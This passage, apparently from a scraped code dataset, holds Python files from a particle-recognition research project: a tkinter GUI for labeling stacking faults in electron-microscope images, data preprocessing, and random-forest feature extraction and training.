data.circleCenters.append(data.newCircleCenter)\n data.recordCircleCenters[-1][0] -= 1\n if event.keysym == \"Right\":\n data.newCircleCenter[0] += 1\n data.circleCenters.pop()\n data.circleCenters.append(data.newCircleCenter)\n data.recordCircleCenters[-1][0] += 1\n if (event.char == \"y\"): #this means there is a stacking fault\n data.labels.pop()\n data.labels.append('yes')\n if (event.char == \"n\"): #means the particle contained no stacking faults and was atomic rez\n data.labels.pop()\n data.labels.append('no')\n if (event.char == \"o\"): #this marks particle as found but not atomic rez for use if accidently marked\n data.labels.pop()\n data.labels.append('null')\n if event.keysym == \"Return\":\n saveLabel(files,data)\n data.fileCounter += 1\n data.photo = imageOpen(files,data)\n data.circleCenters = [ ]\n data.recordCircleCenters = [ ]\n data.radii = [ ]\n data.labels = [ ]\n data.imageSize = []\n if (event.char == \"q\"):\n quitGui(root)\n\ndef redrawAll(canvas, data):\n #draw the photo\n canvas.create_image(0,0,image = data.photo,anchor = \"nw\")\n # draw the circles\n for idx,circleCenter in enumerate(data.circleCenters):\n if (len(data.radii) > 0):\n (cx, cy) = circleCenter\n canvas.create_oval(cx-data.radii[idx], cy-data.radii[idx], cx+data.radii[idx], cy+data.radii[idx], fill=None, outline = \"magenta\")\n else:\n (cx, cy) = circleCenter\n canvas.create_oval(cx-data.radii[idx], cy-data.radii[idx], cx+data.radius, cy+data.radius, fill=None, outline = \"magenta\")\n # draw the text\n for idx,center in enumerate(data.circleCenters):\n canvas.create_text(center[0], center[1]-(data.radii[idx]+5),activefill = 'magenta',fill = 'black', font = ('Helvetica', '16','bold'),text=data.labels[idx])\n \n\ndef quitGui(root):\n root.destroy()\n \ndef redrawAllWrapper(canvas, data):\n canvas.delete(ALL)\n canvas.create_rectangle(0, 0, data.width, data.height,\n 
fill='white', width=0)\n redrawAll(canvas, data)\n canvas.update() \n\ndef mousePressedWrapper(event, canvas, data, scrollbar):\n mousePressed(event, data, canvas, scrollbar)\n redrawAllWrapper(canvas, data)\n\ndef keyPressedWrapper(event, canvas,data,files,root):\n keyPressed(event, data,files,root)\n redrawAllWrapper(canvas, data)\n\nif __name__ == \"__main__\":\n root = Tk()\n\n #setting up a tkinter canvas with scrollbars\n frame = Frame(root, bd=2, relief=SUNKEN)\n frame.grid_rowconfigure(0, weight=1)\n frame.grid_columnconfigure(0, weight=1)\n xscroll = Scrollbar(frame, orient=HORIZONTAL)\n xscroll.grid(row=1, column=0, sticky=E+W)\n yscroll = Scrollbar(frame)\n yscroll.grid(row=0, column=1, sticky=N+S)\n canvas = Canvas(frame, width = 512, height = 512, bd=0, xscrollcommand=xscroll.set, yscrollcommand=yscroll.set)\n canvas.grid(row=0, column=0, sticky=N+S+E+W)\n xscroll.config(command=canvas.xview)\n yscroll.config(command=canvas.yview)\n frame.pack(fill=BOTH,expand=1)\n\n #adding the image\n File = filedialog.askopenfilename(parent=root, initialdir=\"C:/\",title='Choose an image.')\n img = ImageTk.PhotoImage(Image.open(File))\n canvas.create_image(0,0,image=img,anchor=\"nw\")\n canvas.create_oval(1023, 1023, 1024, 1024, fill=\"magenta\", outline = \"magenta\")\n canvas.config(scrollregion=canvas.bbox(ALL))\n \n\n #function to be called when mouse is clicked\n def printcoords(event):\n #outputting x and y coords to console\n x_extra = xscroll.get()\n y_extra = yscroll.get()\n print('x_extra: ', x_extra, 'yextra: ', y_extra)\n print (canvas.canvasx(event.x)+(1024*x_extra[0]),canvas.canvasy(event.y)+(1024*y_extra[0]))\n #mouseclick event\n canvas.bind(\"<Button 1>\",printcoords)\n\n root.mainloop()" }, { "alpha_fraction": 0.6944444179534912, "alphanum_fraction": 0.7006173133850098, "avg_line_length": 23.923076629638672, "blob_id": "45546305e0165657dfe2461e0d26b1099221df57", "content_id": "25265b880ae10b303aeda8a4c327cac979246c82", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 324, "license_type": "no_license", "max_line_length": 83, "num_lines": 13, "path": "/image_processing/timage_app_v2.py", "repo_name": "ckgrosch/particleRecognition", "src_encoding": "UTF-8", "text": "import timage_v2 as tim\nimport sys\n\n\nfname = input('paste directory colletion text file name here or type q to quit: ',)\nif fname == 'q':\n sys.exit()\nwith open(fname) as f:\n content = f.readlines()\ndirectory_list = [x.strip('\\n') for x in content]\n\n#run the pipeline from timage_v0\ntim.adjust_pipeline(directory_list)\n" }, { "alpha_fraction": 0.5978914499282837, "alphanum_fraction": 0.6035549640655518, "avg_line_length": 35.43492126464844, "blob_id": "96bb7aaacc1eb084558a803bcbe4af72938d097b", "content_id": "bda74c521fe3439b1adb85612a09c9295a303132", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11477, "license_type": "no_license", "max_line_length": 333, "num_lines": 315, "path": "/label_data_gui/particle_label_gui_v10.py", "repo_name": "ckgrosch/particleRecognition", "src_encoding": "UTF-8", "text": "from tkinter import filedialog\nfrom tkinter import *\nfrom PIL import Image, ImageTk\nimport glob\nimport os\nimport numpy as np\nfrom ast import literal_eval\n\n\n####################################\n# Subfunctions for initializing, file opening, and interactions\n####################################\n\ndef init(data):\n data.circleCenters = [ ]\n data.radii = [ ]\n data.labels = [ ]\n 
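# imageSize is filled in by imageOpen() with each image's (width, height)\n    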
data.imageSize = []\n\ndef getFiles(root):\n directory = filedialog.askdirectory()\n root.update()\n name = \".\"\n path = directory + \"/*.png\"\n txtpath = directory + \"/*.txt\"\n files = []\n txtfiles = []\n for fname in glob.glob(path):\n files.append(fname)\n for filename in glob.glob(txtpath):\n txtfiles.append(filename)\n\n return(files, txtfiles, directory)\n\ndef txt_reader(file):\n txt_info = open(file,'r')\n txt = []\n centers = []\n radii = []\n labels = []\n for line in txt_info:\n if line == '\\n':\n pass\n else:\n line = line.strip('\\n')\n txt.append(line)\n if 'Weird' in txt[0].split(' '):\n weird = txt[0]\n else:\n weird = 'Not Weird Data'\n weird_stop = txt.index('Particle Location:')\n center_stop = txt.index('Radius Size:')\n radius_stop = txt.index('Defect Label:')\n defect_stop = txt.index('Image Size:')\n for loc in txt[weird_stop+1:center_stop]:\n centers.append(literal_eval(loc))\n for loc in txt[center_stop+1:radius_stop] :\n radii.append(int(loc))\n for loc in txt[radius_stop+1:defect_stop]:\n labels.append(loc)\n return(centers, radii,labels, weird)\n\ndef imageOpen(files,data):\n image = Image.open(files[data.fileCounter])\n data.imageSize.append(image.size)\n photo = ImageTk.PhotoImage(image)\n imgname = files[data.fileCounter].split('/')[-1].split('.')[0]\n if imgname in data.textnames:\n txtfile = data.directory+'/'+imgname+'.txt'\n centers, radii, labels, weird = txt_reader(txtfile)\n else:\n centers = []\n radii = []\n labels = []\n weird = 'Not Weird Data'\n return(photo, centers, radii, labels, weird)\n\ndef saveLabel(files,data):\n split = files[data.fileCounter].split(\".\")\n fname = split[0] + \".txt\"\n label_file = open(fname, \"w\")\n if data.weird == 'Weird Data':\n label_file.write('Weird Data'+ '\\n')\n else:\n label_file.write('Not Weird Data'+ '\\n')\n label_file.write(\"Particle Location:\\n\")\n for loc in data.circleCenters:\n label_file.write(str(loc)+\"\\n\")\n label_file.write(\"\\n\"+\"Radius Size:\"+\"\\n\")\n for r in data.radii:\n label_file.write(str(r)+\"\\n\")\n label_file.write(\"\\n\"+\"Defect Label:\"+\"\\n\")\n for label in data.labels:\n label_file.write(label+\"\\n\")\n label_file.write(\"\\n\"+\"Image Size:\"+\"\\n\")\n for size in data.imageSize:\n label_file.write(str(size)+\"\\n\")\n label_file.close()\n\ndef mousePressed(event, data,canvas, scrollbar):\n y_offset = scrollbar.get()[0]*1024\n data.newCircleCenter = [float(event.x),event.y+y_offset]\n data.circleCenters.append(data.newCircleCenter)\n data.radii.append(data.radius)\n data.labels.append('null') #this marks particle as found but not atomic rez\n\ndef keyPressed(event, data,files,root):\n if (event.keysym == \"BackSpace\"):\n if (len(data.circleCenters) > 0):\n data.circleCenters.pop()\n data.radii.pop()\n data.labels.pop()\n else:\n print(\"No more circles to delete!\")\n if event.char == \"e\": #enlarge circle\n data.radius += 1\n data.radii.pop()\n data.radii.append(data.radius)\n if event.char == \"d\": #decrease circle\n data.radius -= 1\n data.radii.pop()\n data.radii.append(data.radius)\n if event.keysym == \"Up\": #move circle up\n data.newCircleCenter[1] -= 1\n data.circleCenters.pop()\n data.circleCenters.append(data.newCircleCenter)\n if event.keysym == \"Down\": #move circle down\n data.newCircleCenter[1] += 1\n data.circleCenters.pop()\n data.circleCenters.append(data.newCircleCenter)\n if event.keysym == \"w\":\n if data.weird == 'Weird Data':\n data.weird = 'Not Weird Data'\n print('Marked image not weird')\n else:\n data.weird = 'Weird 
Data'\n print('Marked image as weird')\n if event.keysym == \"Left\": #move circle left\n data.newCircleCenter[0] -= 1\n data.circleCenters.pop()\n data.circleCenters.append(data.newCircleCenter)\n if event.keysym == \"Right\":\n data.newCircleCenter[0] += 1\n data.circleCenters.pop()\n data.circleCenters.append(data.newCircleCenter)\n if (event.char == \"y\"): #this means there is a stacking fault\n data.labels.pop()\n data.labels.append('yes')\n if (event.char == \"n\"): #means the particle contained no stacking faults and was atomic rez\n data.labels.pop()\n data.labels.append('no')\n if (event.char == \"o\"): #this marks particle as found but not atomic rez for use if accidently marked\n data.labels.pop()\n data.labels.append('null')\n if (event.char == \"c\"): #this means there is a stacking fault on the edge\n data.labels.pop()\n data.labels.append('surfaceSF')\n if (event.char == \"f\"): #this means there is an edge dislocation\n data.labels.pop()\n data.labels.append('edgeDislcn')\n if event.keysym == \"bracketright\":\n data.fileCounter += 1\n if data.fileCounter == len(files):\n print('No more images to look at!')\n quitGui(root)\n else:\n data.circleCenters = [ ]\n data.radii = [ ]\n data.labels = [ ]\n data.imageSize = []\n data.photo, data.circleCenters, data.radii, data.labels, data.weird = imageOpen(files,data)\n root.title(files[data.fileCounter])\n if event.keysym == \"bracketleft\":\n data.fileCounter -= 1\n data.circleCenters = [ ]\n data.radii = [ ]\n data.labels = [ ]\n data.imageSize = []\n data.photo, data.circleCenters, data.radii, data.labels, data.weird = imageOpen(files,data)\n root.title(files[data.fileCounter])\n if event.keysym == \"Return\":\n saveLabel(files,data)\n data.fileCounter += 1\n if data.fileCounter == len(files):\n print('No more images to look at!')\n quitGui(root)\n else:\n data.circleCenters = [ ]\n data.radii = [ ]\n data.labels = [ ]\n data.imageSize = []\n data.photo, data.circleCenters, data.radii, data.labels, data.weird = imageOpen(files,data)\n root.title(files[data.fileCounter])\n txtpath = data.directory + \"/*.txt\"\n txtfiles = glob.glob(txtpath)\n data.textFilesCounter = len(txtfiles)\n data.textnames = [name.split('/')[-1].split('.')[0] for name in txtfiles]\n if (event.char == \"q\"):\n quitGui(root)\ndef shiftEKeyPressed(event, data,files,root):\n data.radius += 20\n data.radii.pop()\n data.radii.append(data.radius)\n\ndef shiftDKeyPressed(event, data,files,root):\n data.radius -= 20\n data.radii.pop()\n data.radii.append(data.radius)\n\n\ndef redrawAll(canvas, data):\n #draw the photo\n canvas.create_image(0,0,image = data.photo,anchor = \"nw\")\n # draw the circles\n for idx,circleCenter in enumerate(data.circleCenters):\n if (len(data.radii) > 0):\n (cx, cy) = circleCenter\n canvas.create_oval(cx-data.radii[idx], cy-data.radii[idx], cx+data.radii[idx], cy+data.radii[idx], fill=None, outline = \"magenta\")\n else:\n (cx, cy) = circleCenter\n canvas.create_oval(cx-data.radii[idx], cy-data.radii[idx], cx+data.radius, cy+data.radius, fill=None, outline = \"magenta\")\n # draw the text\n for idx,center in enumerate(data.circleCenters):\n canvas.create_text(center[0], center[1]-(data.radii[idx]+5),activefill = 'magenta',fill = 'black', font = ('Helvetica', '18','bold'),text=data.labels[idx])\n if data.weird == 'Weird Data':\n canvas.create_text(5, data.height-10, activefill = None, fill = 'magenta', font = ('Helvetica', '20','bold'), text = 'W')\n\ndef quitGui(root):\n print('Quiting...')\n root.destroy()\n###############\n#Main 
Function to run GUI\n###############\n\ndef run():\n def redrawAllWrapper(canvas, data):\n canvas.delete(ALL)\n canvas.create_rectangle(0, 0, data.width, data.height,\n fill='white', width=0)\n redrawAll(canvas, data)\n canvas.update()\n\n def mousePressedWrapper(event, canvas, data, scrollbar):\n mousePressed(event, data, canvas, scrollbar)\n redrawAllWrapper(canvas, data)\n\n def keyPressedWrapper(event, canvas,data,files,root):\n keyPressed(event, data,files,root)\n if data.fileCounter < len(files):\n redrawAllWrapper(canvas, data)\n else:\n pass\n def shiftEKeyPressedWrapper(event, canvas, data,root):\n shiftEKeyPressed(event, data,files,root)\n redrawAllWrapper(canvas, data)\n def shiftDKeyPressedWrapper(event, canvas, data,root):\n shiftDKeyPressed(event, data,files,root)\n redrawAllWrapper(canvas, data)\n # Set up data structure\n class Struct(object): pass\n\n #initialize all the required data\n data = Struct()\n data.radius = 50\n data.fileCounter = 0\n init(data)\n print('shift+click to select particle','\\n', 'arrow keys move circle','\\n', '\"e\" enlarges circle, \"d\" decreases circle', '\\n', '\"y\" to label stacking fault','\\n', '\"n\" to label no visible stacking fault','\\n', '\"o\" if only one plane of particle is resolved','\\n', 'hit enter to continue to next image', '\\n', '\"q\" quits program')\n\n\n #run the main image labeling gui\n root = Tk()\n files, textfiles, data.directory = getFiles(root)\n data.textFilesCounter = len(textfiles)\n data.textnames = [name.split('/')[-1].split('.')[0] for name in textfiles]\n data.photo, data.circleCenters, data.radii, data.labels, data.weird = imageOpen(files,data)\n root.title(files[data.fileCounter])\n data.width = 1024\n data.height = 1024\n data.weird = 'not weird'\n\n # create the root and the canvas\n canvas = Canvas(width=data.width, height=data.height)\n\n\n #Create scrollbar\n scrollbar = Scrollbar(root)\n scrollbar.config(command = canvas.yview)\n scrollbar.pack(side = RIGHT, fill = Y)\n canvas.config(yscrollcommand = scrollbar.set)\n canvas.pack(side = LEFT, expand = True, fill = 'both')\n canvas.create_image(0,0,image = data.photo, anchor = \"nw\")\n canvas.config(scrollregion = canvas.bbox(ALL))\n\n # set up events\n root.bind(\"<Shift-Button-1>\", lambda event:\n mousePressedWrapper(event, canvas, data,scrollbar))\n root.bind(\"<Shift-Up>\", lambda event:\n shiftEKeyPressedWrapper(event, canvas, data,root))\n root.bind(\"<Shift-Down>\", lambda event:\n shiftDKeyPressedWrapper(event, canvas, data,root))\n root.bind_all(\"<Key>\", lambda event:\n keyPressedWrapper(event, canvas, data,files,root))\n\n if data.fileCounter < len(files):\n redrawAll(canvas, data)\n root.mainloop()\n else:\n pass\n\n # and launch the app\n #root.mainloop() # blocks until window is closed\n print(\"bye!\")\n print(data.circleCenters,data.radii, data.labels)\n\nrun()\n" }, { "alpha_fraction": 0.5358032584190369, "alphanum_fraction": 0.5918430685997009, "avg_line_length": 38.654319763183594, "blob_id": "043c7a248bbfa989b3c17353db1363da1854b090", "content_id": "c6e175d506dcc622cad8ac95350abd71969f7cf6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3212, "license_type": "no_license", "max_line_length": 66, "num_lines": 81, "path": "/image_processing/preprocess_synth_data.py", "repo_name": "ckgrosch/particleRecognition", "src_encoding": "UTF-8", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport os\nfrom glob import glob\nfrom ncempy.io import dm\nfrom 
matplotlib.image import imsave\nfrom matplotlib import cm\nfrom skimage import transform\nfrom skimage import exposure\nfrom ast import literal_eval\nimport shutil\nfrom skimage import io\nfrom scipy.io import loadmat\n\n\ndef loadData(directory, if_save = False, selectImages = None):\n matFiles = glob(directory+'/*.mat')\n if selectImages == None:\n split = int(len(matFiles)*0.75)\n else:\n split = int(selectImages*0.75)\n print('split is:', split)\n trainX = []\n trainY = []\n testX = []\n testY = []\n for file in matFiles[:split]:\n struct = loadmat(file)\n img = struct['sField']['imagesOutput'][0][0]\n mask = struct['sField']['locationParticles'][0][0]\n img = img.reshape(img.shape+ (1,)).astype('float32')\n mask = mask.reshape(img.shape+ (1,)).astype('float32')\n trainX.append(np.copy(img[:512,:512]))\n trainX.append(np.copy(img[512:,:512]))\n trainX.append(np.copy(img[:512,512:]))\n trainX.append(np.copy(img[512:,512:]))\n trainY.append(np.copy(mask[:512,:512]))\n trainY.append(np.copy(mask[512:,:512]))\n trainY.append(np.copy(mask[:512,512:]))\n trainY.append(np.copy(mask[512:,512:]))\n trainX = np.asanyarray(trainX)\n trainY = np.asanyarray(trainY)\n\n if selectImages == None:\n for file in matFiles[split:]:\n struct = loadmat(file)\n img = struct['sField']['imagesOutput'][0][0]\n mask = struct['sField']['locationParticles'][0][0]\n img = img.reshape(img.shape+ (1,)).astype('float32')\n mask = mask.reshape(img.shape+ (1,)).astype('float32')\n testX.append(np.copy(img[:512,:512]))\n testX.append(np.copy(img[512:,:512]))\n testX.append(np.copy(img[:512,512:]))\n testX.append(np.copy(img[512:,512:]))\n testY.append(np.copy(mask[:512,:512]))\n testY.append(np.copy(mask[512:,:512]))\n testY.append(np.copy(mask[:512,512:]))\n testY.append(np.copy(mask[512:,512:]))\n else:\n for file in matFiles[split:selectImages]:\n struct = loadmat(file)\n img = struct['sField']['imagesOutput'][0][0]\n mask = struct['sField']['locationParticles'][0][0]\n img = img.reshape(img.shape+ (1,)).astype('float32')\n mask = mask.reshape(img.shape+ (1,)).astype('float32')\n testX.append(np.copy(img[:512,:512]))\n testX.append(np.copy(img[512:,:512]))\n testX.append(np.copy(img[:512,512:]))\n testX.append(np.copy(img[512:,512:]))\n testY.append(np.copy(mask[:512,:512]))\n testY.append(np.copy(mask[512:,:512]))\n testY.append(np.copy(mask[:512,512:]))\n testY.append(np.copy(mask[512:,512:]))\n testX = np.asanyarray(testX)\n testY = np.asanyarray(testY)\n if if_save == True:\n np.save('trainSynthImages.npy',trainX)\n np.save('trainSynthMasks.npy',trainY)\n np.save('testSynthImages.npy',testX)\n np.save('testSynthMasks.npy',testY)\n return trainX, trainY, testX, testY\n" }, { "alpha_fraction": 0.6094784736633301, "alphanum_fraction": 0.6261470317840576, "avg_line_length": 42.04499816894531, "blob_id": "df0eee01b4950d677a2197ed1fd531e2d5afe4eb", "content_id": "e0792376ea872e8f140b9d4bbce1cb2bbe9b3252", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 17218, "license_type": "no_license", "max_line_length": 129, "num_lines": 400, "path": "/classfier_builds/rf_classifier.py", "repo_name": "ckgrosch/particleRecognition", "src_encoding": "UTF-8", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nfrom skimage import io\nfrom skimage.color import rgb2gray\nimport os\nimport skimage.feature\nimport skimage.filters\nimport skimage.color\nfrom skimage.util import invert\nfrom skimage.morphology import skeletonize\nfrom scipy.signal import correlate2d\nimport 
pandas as pd\n# import cv2\nfrom pathlib import Path\nfrom joblib import Parallel, delayed\nfrom tqdm import tqdm\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.utils import shuffle\nfrom sklearn.model_selection import StratifiedKFold\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.externals import joblib\nfrom sklearn import model_selection\nimport logging\nfrom sklearn.metrics import confusion_matrix\nimport seaborn as sns\nfrom glob import glob\nimport shutil\nfrom ast import literal_eval\nfrom skimage.feature import blob_dog, blob_log, blob_doh\n\ndef file_relabel(og_dir, new_dir):\n \"\"\"Takes the old directory with a bunch of from microscope file and moves\n the pngs and txt files to the unified random forest data directory. While\n doing this it renames the files to include the experiment date in the\n filename.\"\"\"\n dir_list = os.listdir(og_dir)\n print(dir_list)\n skip_count = 0\n for direct in dir_list:\n if direct == '.DS_Store':\n pass\n else:\n pngs = glob(og_dir+'/'+direct+'/*/adjustedPNG2/*.png')\n print(len(pngs))\n txts = glob(og_dir+'/'+direct+'/*/adjustedPNG2/*.txt')\n print(len(txts))\n for idx, txt in enumerate(txts):\n txtname = txt.split('.')[0].split('/')[-1]\n newname = direct+'_'+txtname\n if txtname == pngs[idx].split('.')[0].split('/')[-1]:\n shutil.copy2(txt,new_dir+'/'+newname+'.txt')\n shutil.copy2(pngs[idx],new_dir+'/'+newname+'.png')\n else:\n if txtname == pngs[skip_count+idx+1].split('.')[0].split('/')[-1]:\n shutil.copy2(txt,new_dir+'/'+newname+'.txt')\n shutil.copy2(pngs[idx],new_dir+'/'+newname+'.png')\n skip_count += 1\n else:\n pass\n print('done')\n\ndef txt_reader(file):\n txt_info = open(file,'r')\n txt = []\n centers = []\n radii = []\n labels = []\n for line in txt_info:\n if line == '\\n':\n pass\n else:\n line = line.strip('\\n')\n txt.append(line)\n if 'Weird' in txt[0].split(' ')[0]:\n weird = txt[0]\n else:\n weird = 'Not Weird Data'\n weird_stop = txt.index('Particle Location:')\n center_stop = txt.index('Radius Size:')\n radius_stop = txt.index('Defect Label:')\n defect_stop = txt.index('Image Size:')\n for loc in txt[weird_stop+1:center_stop]:\n centers.append(literal_eval(loc))\n for loc in txt[center_stop+1:radius_stop] :\n radii.append(int(loc))\n for loc in txt[radius_stop+1:defect_stop]:\n labels.append(loc)\n return(centers, radii,labels, weird)\n\ndef rf_label_reader(txt_file, image_file, use_weird = True):\n \"\"\"Reads in text file and associated image file and using the information in the text file\n makes an array of labels and saves the associated region of the image corrsponding to that label\n to create training and testing data for random forest creation\"\"\"\n image = io.imread(image_file, as_grey = True)\n #test for 1024x1024 image\n if image.shape != (1024,1024):\n raise RuntimeError('Image is not required shape: 1024x1024')\n\n #setup required variables\n image_cuts = []\n empty_count = 0 #how many image cuts generated with the label empty meaning no particle present\n null_count = 0 #how many image cuts generated with the label null meaning particle present but not atomic resolution\n no_count = 0 #how many image cuts generated with the label no meaning particle present, atomic res, no defect\n yes_count = 0 #how many image cuts generated with the label yes meaning particle present, atomic res, has defect\n\n #read text file\n centers, radii, labels, weird = txt_reader(txt_file)\n\n #determine whether to include weird data in the dataset\n if use_weird == False:\n if weird 
== 'Weird Data':\n return 'skip', 'skip', 'skip', 'skip', 'skip', 'skip'\n\n #create image and label pair\n if len(centers) == 0: #ID if there are no particles present in text file\n for x in range(0,4*256,256):\n for y in range(0,4*256,256):\n image_slice = image[x:x+256,y:y+256]\n image_cuts.append(image_slice)\n labels.append('empty')\n empty_count += 1\n else:\n for idx, loc in enumerate(labels):\n if loc == 'null':\n null_count += 1\n if loc == 'no':\n no_count += 1\n if loc == 'yes':\n yes_count += 1\n if loc == 'edgeDislcn':\n yes_count += 1\n labels[idx] = 'yes'\n if loc == 'surfaceSF':\n yes_count += 1\n labels[idx] = 'yes'\n\n for idx, center in enumerate(centers): #slice up image to create images to feed into\n x_min = center[0]-radii[idx]-2\n x_max = center[0]+radii[idx]+2\n y_min = center[1]-radii[idx]-2\n y_max = center[1]+radii[idx]+2\n if x_min < 0:\n x_min = 0\n if y_min < 0:\n y_min = 0\n if x_max > 1023:\n x_max = 1023\n if y_max > 1023:\n y_max = 1023\n image_slice = image[int(y_min):int(y_max), int(x_min):int(x_max)]\n image_cuts.append(image_slice)\n\n return labels, image_cuts, empty_count, null_count, no_count, yes_count\n\ndef rotate(df):\n \"\"\"Function to rotate non-null images in order to augment data\"\"\"\n rot_dir = {'filename':[],'label':[]}\n for idx, label in enumerate(df['label']):\n if label == 'null':\n pass\n else:\n image = io.imread(df['filename'][idx])\n name = df['filename'][idx].split('.')[0]\n for count in np.arange(1,4):\n rot_img = np.rot90(image,count)\n rot_dir['filename'].append(name+'rot'+str(count)+'.png')\n rot_dir['label'].append(label)\n try:\n plt.imsave(name+'rot'+str(count)+'.png',rot_img,cmap = 'gray')\n except:\n pass\n df2 = pd.DataFrame(data = rot_dir)\n df = df.append(df2)\n print('Done!')\n return df\n\ndef rf_data_pipeline(directory, use_weird = True):\n \"\"\"Wrapper function to run through directories of labels and images to create random forest\n training and testing set. 
Returns a pandas dataframe with all the labels and associated image file names\"\"\"\n #set up required variables\n txt_list = glob(directory+'*/*.txt')\n image_list = glob(directory+'*/*.png')\n # if os.path.isdir(directory+'/text_files') == False:\n # raise RuntimeError('No text file directory present.')\n # if os.path.isdir(directory+'/images') == False:\n # raise RuntimeError('No image file directory present.')\n if len(txt_list) == 0:\n raise RuntimeError('No txt label files')\n if len(image_list) == 0:\n raise RuntimeError('No image files')\n txt_name_list = [name.split('/')[-1].split('.')[0] for name in txt_list]\n image_name_list = [name.split('/')[-1].split('.')[0] for name in image_list]\n data = {'filename':[],'label':[]}\n total_empty_count = 0\n total_null_count = 0\n total_no_count = 0\n total_yes_count = 0\n if os.path.isdir(directory+'/old_text_files') == False:\n os.mkdir(directory+'/old_text_files')\n if os.path.isdir(directory+'/old_images') == False:\n os.mkdir(directory+'/old_images')\n if os.path.isdir(directory+'/labeled_images') == False:\n os.mkdir(directory+'/labeled_images')\n\n #test for correct images and labels\n if txt_name_list != image_name_list:\n raise RuntimeError('Names of txt label files do not match names of image files.')\n\n #create dataframe of files and labels\n for idx, txt in enumerate(txt_list):\n labels, image_cuts, empty_count, null_count, no_count, yes_count = rf_label_reader(txt, image_list[idx], use_weird)\n if labels == 'skip':\n continue\n total_empty_count += empty_count\n total_null_count += null_count\n total_no_count += no_count\n total_yes_count += yes_count\n for idx2, label in enumerate(labels):\n data['label'].append(label)\n rf_data_fname = directory+'/labeled_images/'+image_name_list[idx]+ '_'+ label + '_' + str(idx2) +'.png'\n plt.imsave(rf_data_fname,image_cuts[idx2], cmap='gray')\n data['filename'].append(rf_data_fname)\n shutil.move(txt,directory+'/old_text_files/')\n shutil.move(image_list[idx],directory+'/old_images/')\n df = pd.DataFrame(data = data)\n print(df['label'].iloc[0])\n df = rotate(df)\n df.to_csv(directory+'/rf_data.csv')\n print('done!')\n print('empty: {}, null: {}, no: {}, yes {}'.format(total_empty_count*4, total_null_count,total_no_count*4,total_yes_count*4))\n return df, (total_empty_count, total_null_count, total_no_count, total_yes_count)\n\n\ndef sobel_edges(gray_image):\n \"\"\"Returns histogram of edges\"\"\"\n edges = skimage.filters.sobel(gray_image)\n edge_hist = np.histogram(edges.flatten(),bins=50, density = True)[0]\n return edge_hist\n\ndef blobs_log(gray_image):\n \"\"\"returns two features: average blob size and total number of blobs detected by laplace of gaussians\"\"\"\n blob = skimage.feature.blob_log(gray_image,max_sigma=2, num_sigma=30, threshold=.2)\n blobs = blob[:,2]\n num_blobs = len(blobs)\n if num_blobs == 0:\n avg_blob = 0\n else:\n avg_blob = blobs.mean()\n blob_info = np.array([avg_blob, num_blobs])\n return blob_info\n\ndef fft_hist(gray_image):\n \"\"\"returns 20 bin histogram of frequencies from fft of image\"\"\"\n fft = np.log2(abs(np.fft.rfft2(gray_image)))\n fhist = np.histogram(fft,bins=20,density = True)[0]\n return fhist\n\ndef center_cut(image):\n \"\"\"returns a 1d array of length 400 which is 20x20 center of the image\"\"\"\n middle = (image.shape[0]//2,image.shape[1]//2)\n cut = image[(middle[0]-10):(middle[0]+10),(middle[1]-10):(middle[1]+10)].ravel()\n return cut\n\ndef lbp_cut(gray_image):\n \"\"\"returns a 1d array of length 400 which is 20x20 center of the 
lbp\"\"\"\n    lbp = skimage.feature.local_binary_pattern(gray_image,2,16)\n    middle = (lbp.shape[0]//2,lbp.shape[1]//2)\n    lbp = lbp[(middle[0]-10):(middle[0]+10),(middle[1]-10):(middle[1]+10)].ravel()\n    return lbp\n\ndef gray_range(image):\n    \"\"\"gives the mean and standard deviation for the image\"\"\"\n    irange = np.array([image.mean(),image.std()])\n    return irange\n\ndef get_features(file, label):\n    \"\"\"Function takes in a file name from list of files, opens it, creates a gray version for features which require\n    gray image and then creates a list of features as well as a label which is then returned\"\"\"\n    image = io.imread(file, as_grey=True)\n    features = []\n    features.append(center_cut(image))\n    features.append(lbp_cut(image))\n    features.append(fft_hist(image))\n    features.append(blobs_log(image))\n    features.append(sobel_edges(image))\n    features.append(gray_range(image))\n    features = np.concatenate(features)\n    return (features,label)\n\ndef feature_frame(file_label_df):\n    \"\"\"Creates a pandas dataframe with all the calculated features for all the images in a given dataframe which\n    contains all the images file names and labels.\"\"\"\n    features = [get_features(file, file_label_df['label'].iloc[idx]) for idx,file in enumerate(file_label_df['filename'])]\n    print('Done!')\n    feat_list, labels_list = zip(*features)\n    df = pd.DataFrame.from_records(feat_list)\n    column_names = [['center_cut']*400,['lbp_cut']*400,\\\n                    ['fft_hist']*20,['blobs_log']*2,['sobel_edges']*50,['mean'],['std']]\n    column_names = sum(column_names, [])\n    df.columns = column_names\n    df['Label'] = labels_list\n    return df\n\ndef balance_data_classes(df,total_empty_count, total_null_count, total_no_count, total_yes_count):\n    \"\"\"Create two balanced dataframes of features with an equal number of each class, one with roughly 70% of the data\n    and the other with the remaining 30%\"\"\"\n    train_cutoff = int(np.array([total_empty_count, total_null_count, total_no_count, total_yes_count]).min()*0.7)\n    validate_cutoff = int(np.array([total_empty_count, total_null_count, total_no_count, total_yes_count]).min()*0.2)\n    test_cutoff = int(np.array([total_empty_count, total_null_count, total_no_count, total_yes_count]).min()*0.1)\n    #shuffle input dataframe so that you do not end up with the same rotated image several times\n    df = shuffle(df, random_state=0)\n    bal_df1 = pd.DataFrame(columns=df.columns.values)\n    bal_df2 = pd.DataFrame(columns=df.columns.values)\n    names_list = df['Label'].drop_duplicates()\n    for name in names_list:\n        temp = df[df.values == name]\n        bal_df1=bal_df1.append(temp.iloc[:train_cutoff,:])\n        bal_df2=bal_df2.append(temp.iloc[train_cutoff:,:])\n    bal_df1 = shuffle(bal_df1, random_state=0)\n    bal_df2 = shuffle(bal_df2, random_state=0)\n    return bal_df1, bal_df2\n\ndef split_set(train_set,test_set):\n    \"\"\"splits training and testing dataframes into feature and label sets\"\"\"\n    X_train = train_set.iloc[:,:-1]\n    Y_train = train_set.iloc[:,-1]\n    X_test = test_set.iloc[:,:-1]\n    Y_test = test_set.iloc[:,-1]\n    return X_train, Y_train, X_test, Y_test\n\ndef train_random_forest(X_train, Y_train, nestimators = 50,crit='gini',max_feat='auto'):\n    